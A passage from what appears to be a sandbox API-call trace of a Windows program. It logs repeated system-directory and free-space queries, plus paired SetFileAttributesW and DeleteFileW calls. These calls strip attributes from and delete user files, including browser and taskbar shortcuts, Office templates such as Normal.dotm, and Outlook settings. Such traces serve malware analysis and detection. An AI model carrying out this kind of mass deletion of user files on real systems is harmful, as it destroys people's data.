CoTaskMemFree (pv=0x4e1c10) [0148.493] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.493] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.493] CoTaskMemFree (pv=0x4e1c10) [0148.497] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.497] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.497] CoTaskMemFree (pv=0x4e1c10) [0148.498] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.498] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.498] CoTaskMemFree (pv=0x4e1c10) [0148.498] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0148.499] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0148.499] CoTaskMemFree (pv=0x4e1c10) [0148.500] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.045] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx", dwFileAttributes=0x80) returned 1 [0149.045] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx")) returned 1 [0149.055] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.055] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.056] CoTaskMemFree (pv=0x4e1c10) [0149.056] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.056] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.057] CoTaskMemFree (pv=0x4e1c10) [0149.057] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.057] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.057] CoTaskMemFree (pv=0x4e1c10) [0149.058] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.058] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.058] CoTaskMemFree (pv=0x4e1c10) [0149.059] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.059] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.059] CoTaskMemFree (pv=0x4e1c10) [0149.060] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.060] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.060] CoTaskMemFree (pv=0x4e1c10) [0149.061] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.061] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.061] CoTaskMemFree (pv=0x4e1c10) [0149.061] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.061] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.061] CoTaskMemFree (pv=0x4e1c10) [0149.062] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.068] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1 [0149.069] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk")) returned 1 [0149.072] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.077] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk", dwFileAttributes=0x80) returned 1 [0149.078] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk")) returned 1 [0149.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.086] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", dwFileAttributes=0x80) returned 1 [0149.086] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 1 [0149.089] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.095] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", dwFileAttributes=0x80) returned 1 [0149.096] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 1 [0149.098] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.098] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.099] CoTaskMemFree (pv=0x4e1c10) [0149.099] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.099] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.099] CoTaskMemFree (pv=0x4e1c10) [0149.100] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.100] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.100] CoTaskMemFree (pv=0x4e1c10) [0149.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.108] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1 [0149.109] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk")) returned 1 [0149.114] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.120] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk", dwFileAttributes=0x80) returned 1 [0149.121] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk")) returned 1 [0149.126] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.132] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", dwFileAttributes=0x80) returned 1 [0149.133] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 1 [0149.135] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.140] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk", dwFileAttributes=0x80) returned 1 [0149.141] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk")) returned 1 [0149.144] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.149] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk", dwFileAttributes=0x80) returned 1 [0149.149] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk")) returned 1 [0149.152] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.159] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", dwFileAttributes=0x80) returned 1 [0149.160] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 1 [0149.162] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.168] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", dwFileAttributes=0x80) returned 1 [0149.168] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk")) returned 1 [0149.171] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0149.185] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", dwFileAttributes=0x80) returned 1 [0149.185] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 1 [0149.188] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.188] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.188] CoTaskMemFree (pv=0x4e1c10) [0149.190] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.190] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.190] CoTaskMemFree (pv=0x4e1c10) [0149.191] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.191] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.191] CoTaskMemFree (pv=0x4e1c10) [0149.192] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.192] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.192] CoTaskMemFree (pv=0x4e1c10) [0149.193] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.193] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.193] CoTaskMemFree (pv=0x4e1c10) [0149.193] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.193] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.193] CoTaskMemFree (pv=0x4e1c10) [0149.194] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.194] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.194] CoTaskMemFree (pv=0x4e1c10) [0149.195] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.195] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.195] CoTaskMemFree (pv=0x4e1c10) [0149.196] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.196] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.196] CoTaskMemFree (pv=0x4e1c10) [0149.197] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.197] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.198] CoTaskMemFree (pv=0x4e1c10) [0149.204] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.204] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.204] CoTaskMemFree (pv=0x4e1c10) [0149.205] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.205] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.205] CoTaskMemFree (pv=0x4e1c10) [0149.205] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.205] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.206] CoTaskMemFree (pv=0x4e1c10) [0149.206] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.206] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.206] CoTaskMemFree (pv=0x4e1c10) [0149.207] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.207] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.207] CoTaskMemFree (pv=0x4e1c10) [0149.209] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.209] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.209] CoTaskMemFree (pv=0x4e1c10) [0149.210] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.216] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK", dwFileAttributes=0x80) returned 1 [0149.217] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk")) returned 1 [0149.221] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.228] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK", dwFileAttributes=0x80) returned 1 [0149.229] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk")) returned 1 [0149.231] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.231] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.232] CoTaskMemFree (pv=0x4e1c10) [0149.233] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0149.239] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", dwFileAttributes=0x80) returned 1 [0149.239] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml")) returned 1 [0149.241] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.241] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.242] CoTaskMemFree (pv=0x4e1c10) [0149.243] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.243] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.243] CoTaskMemFree (pv=0x4e1c10) [0149.244] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.244] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.245] CoTaskMemFree (pv=0x4e1c10) [0149.245] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.245] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.245] CoTaskMemFree (pv=0x4e1c10) [0149.249] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.249] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.250] CoTaskMemFree (pv=0x4e1c10) [0149.250] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.250] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.250] CoTaskMemFree (pv=0x4e1c10) [0149.252] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.252] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.252] CoTaskMemFree (pv=0x4e1c10) [0149.254] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0149.259] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml", dwFileAttributes=0x80) returned 1 [0149.260] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml")) returned 1 [0149.262] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.262] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.262] CoTaskMemFree (pv=0x4e1c10) [0149.263] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.263] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.263] CoTaskMemFree (pv=0x4e1c10) [0149.264] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.264] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.264] CoTaskMemFree (pv=0x4e1c10) [0149.264] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.265] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.265] CoTaskMemFree (pv=0x4e1c10) [0149.265] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.265] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.265] CoTaskMemFree (pv=0x4e1c10) [0149.266] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.266] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.266] CoTaskMemFree (pv=0x4e1c10) [0149.267] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.267] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.267] CoTaskMemFree (pv=0x4e1c10) [0149.269] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0149.276] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", dwFileAttributes=0x80) returned 1 [0149.276] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm")) returned 1 [0149.279] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.279] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.279] 